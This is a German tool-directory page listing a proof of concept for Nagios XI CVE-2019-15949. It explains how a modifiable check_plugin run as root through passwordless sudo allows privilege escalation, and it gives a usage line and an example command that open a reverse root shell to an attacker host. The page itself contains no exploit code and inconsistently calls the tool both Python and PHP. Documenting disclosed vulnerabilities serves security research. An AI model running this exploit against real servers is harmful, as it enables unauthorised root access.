Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Nagios-CVE-2019-15949-RCE — ein PoC für die Nagios CVE-2019-15949 RCE in Python | Kitploit
Tools/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

ein PoC für die Nagios CVE-2019-15949 RCE in Python

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Nagios-CVE-2019-15949-RCE-Poc

Ein Python-PoC für die CVE-2019-15949

Übersicht

In Nagios XI <= 5.6.5 existiert eine Schwachstelle, die es einem Angreifer ermöglicht, eine RCE auszunutzen, um Privilegien auf Root auszuweiten. Der Exploit erfordert Zugriff auf den Server als Benutzer 'nagios' oder CCM-Zugriff über die Weboberfläche mit Berechtigungen zur Verwaltung von Plugins.

Details

Das getprofile.sh-Skript, das durch das Herunterladen eines Systemprofils (profile.php?cmd=download) aufgerufen wird, wird über einen passwortlosen sudo-Eintrag als Root ausgeführt; das Skript führt die ausführbare Datei 'check_plugin' aus, die dem Benutzer nagios gehört. Ein in Nagios XI angemeldeter Benutzer mit Berechtigungen zum Ändern von Plugins oder der Benutzer 'nagios' auf dem Server kann die ausführbare Datei 'check_plugin' modifizieren und schädliche Befehle einfügen, die als Root ausgeführt werden.

POC

Es wurde ein PHP-PoC entwickelt, der einen Payload hochlädt, der zu einer Reverse-Root-Shell führt. Verwendung:

python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport

Beispiel:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

Offenlegung

An Nagios gemeldet am: 29. Juli 2019 Von Nagios bestätigt am: 29. Juli 2019 Behoben in Version: 5.6.6 am: 20. August 2019 CVE zugewiesen am: 6. September 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

Tool herunterladen